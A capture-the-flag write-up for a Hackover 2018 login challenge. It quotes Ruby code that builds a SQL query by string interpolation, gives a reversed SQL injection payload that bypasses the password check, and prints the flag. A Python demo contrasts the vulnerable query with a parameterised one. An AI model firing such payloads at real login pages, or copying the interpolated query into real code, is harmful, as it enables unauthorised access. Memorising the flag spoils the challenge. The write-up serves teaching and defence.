Tags: sqli github

Rating: 0

**Description**

> Howdy mate! Just login and hand out the flag, aye! You can find on [h18johndoe](https://github.com/h18johndoe/user_repository/blob/master/user_repo.rb) has all you need!
>
> http://yo-know-john-dow.ctf.hackover.de:4567/login
>
> alternative: 46.101.157.142:4567/login

**No files provided**

**Solution**

We get a simple login screen, but no way to register.

First we need a username. h18johndoe from the description doesn't work. The link in the description, however, appears to show the source code of the website's back end:

```ruby
class UserRepo

  def initialize(database)
    @database = database
    @users = database[:users]
  end

  # The method header and the reverse "hash" below are not in the snippet as
  # extracted; they are reconstructed from the writeup's description of the
  # login method (the parameter name input_password is a reconstruction too).
  def login(identification, input_password)
    hashed_input_password = input_password.reverse
    # Both values are interpolated straight into the SQL string.
    query = "select id, phone, email from users where email = '#{identification}' and password_digest = '#{hashed_input_password}' limit 1"
    puts "SQL executing: '#{query}'"
    @database[query].first if user_exists?(identification)
  end

  def user_exists?(identification)
    !get_user_by_identification(identification).nil?
  end

  private

  # Sequel escapes the values in hash conditions, so this lookup is not injectable.
  def get_user_by_identification(identification)
    @users.where(phone: identification).or(email: identification).first
  end

end
```


The login method has a clear SQL injection, since the password "hashing" just reverses the input we give it, without any sanitising, and the result is interpolated straight into the query. Before login is called, however, we need to pass the user_exists? check, which seems to use prepared statements. So we still need an existing e-mail.

The file above has commits from two users, h18johndoe and john1234. GitHub doesn't seem to show e-mail addresses of users, but if we clone the repo and check the commit log, we can see the e-mails:


```
$ git log
commit b26aed283d56c65845b02957a11d90bc091ac35a
Author: John Doe <angelo_muh@yahoo.org>
Date: Tue Oct 2 23:55:57 2018 +0200

commit 5383fb4179f1aec972c5f2cc956a0fee07af353a
Author: John Doe <jamez@hemail.com>
Date: Tue Oct 2 23:04:13 2018 +0200

commit 2d3e1dc0c5712efd9a0c7a13d2f0a8faaf51153c
Author: John Doe <john_doe@gmail.com>
Date: Tue Oct 2 23:02:26 2018 +0200

commit 3ec70acbf846037458c93e8d0cb79a6daac98515
Author: John Doe <john_doe@notes.h18>
Date: Tue Oct 2 23:01:30 2018 +0200

Add user repo class and file
```


And the last one (earliest commit chronologically) is actually the correct e-mail address: john_doe@notes.h18. After entering this e-mail we get asked for the password, and this is where we can do the SQL injection, since we don't know the user's password.

We only need to log in, so an extremely simple injection is enough:

```
input: 'or''=='
reverse: '==''ro'
full query after injection and re-reverse:
select id, phone, email from users where email = 'john_doe@notes.h18'
and password_digest = ''or '' == '' limit 1
```
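To make the difference between the interpolated query and a bound-parameter query concrete, here is an added example; it is not the challenge's code, and it uses Python's built-in sqlite3 instead of Ruby/Sequel so it runs without any gems. The table contents, the phone number and the password hunter2 are constructed; the e-mail john_doe@notes.h18 and the shape of the login query come from the writeup. The block reproduces the reversed-input "hash", the parameterised user_exists? gate and both versions of the login query, then checks which version lets the string from the final injected query above (the part that lands in the password_digest position) through.

```python
"""Vulnerable vs. parameterised login check modelled on the writeup's UserRepo.

Added example, not the challenge's code. The fixture below is constructed;
only the e-mail john_doe@notes.h18 and the query shape come from the writeup.
"""
import sqlite3

USER_EMAIL = "john_doe@notes.h18"   # from the writeup
REAL_PASSWORD = "hunter2"            # constructed; the real one was unknown in the CTF
PHONE = "+00-000-constructed"        # constructed placeholder


def fake_digest(password: str) -> str:
    """The challenge's 'hash': the input string reversed."""
    return password[::-1]


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed row."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "create table users (id integer primary key, phone text, "
        "email text, password_digest text)"
    )
    db.execute(
        "insert into users (phone, email, password_digest) values (?, ?, ?)",
        (PHONE, USER_EMAIL, fake_digest(REAL_PASSWORD)),
    )
    return db


def user_exists(db: sqlite3.Connection, identification: str) -> bool:
    """The gate before login. The original uses Sequel hash conditions, which
    escape the value; ? placeholders are the sqlite3 equivalent."""
    row = db.execute(
        "select id from users where phone = ? or email = ? limit 1",
        (identification, identification),
    ).fetchone()
    return row is not None


def login_vulnerable(db, identification, password):
    """String interpolation as in the writeup's login method."""
    if not user_exists(db, identification):
        return None
    hashed = fake_digest(password)
    query = (
        f"select id, phone, email from users where email = '{identification}' "
        f"and password_digest = '{hashed}' limit 1"
    )
    return db.execute(query).fetchone()


def login_parameterised(db, identification, password):
    """Same check with bound parameters: the digest is data, never SQL."""
    if not user_exists(db, identification):
        return None
    return db.execute(
        "select id, phone, email from users "
        "where email = ? and password_digest = ? limit 1",
        (identification, fake_digest(password)),
    ).fetchone()


# The writeup's final query reads  password_digest = ''or '' == '' limit 1,
# so the string 'or '' == ' reaches the query after the reverse step and the
# typed password is its reverse. SQLite accepts == as equality, and the OR
# makes the WHERE clause true for every row.
INJECTED_DIGEST = "'or '' == '"
PAYLOAD = INJECTED_DIGEST[::-1]


def demo() -> dict:
    """Run both login variants against the fixture and report who gets in."""
    db = make_db()
    return {
        "real_password_vuln": login_vulnerable(db, USER_EMAIL, REAL_PASSWORD) is not None,
        "real_password_safe": login_parameterised(db, USER_EMAIL, REAL_PASSWORD) is not None,
        "payload_vuln": login_vulnerable(db, USER_EMAIL, PAYLOAD) is not None,
        "payload_safe": login_parameterised(db, USER_EMAIL, PAYLOAD) is not None,
        # h18johndoe is not a user, so the gate rejects it before any query runs
        "unknown_user_vuln": login_vulnerable(db, "h18johndoe", PAYLOAD) is not None,
    }


if __name__ == "__main__":
    for name, logged_in in demo().items():
        print(f"{name}: {'logged in' if logged_in else 'rejected'}")
```

The interesting line in the output is the pair payload_vuln / payload_safe: the same typed password that satisfies the interpolated query is just a non-matching digest once it is bound as a parameter. The user_exists gate behaves identically in both variants, which is exactly why knowing a valid e-mail was all the writeup needed.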

hackover18{I_KN0W_H4W_70_STALK_2018}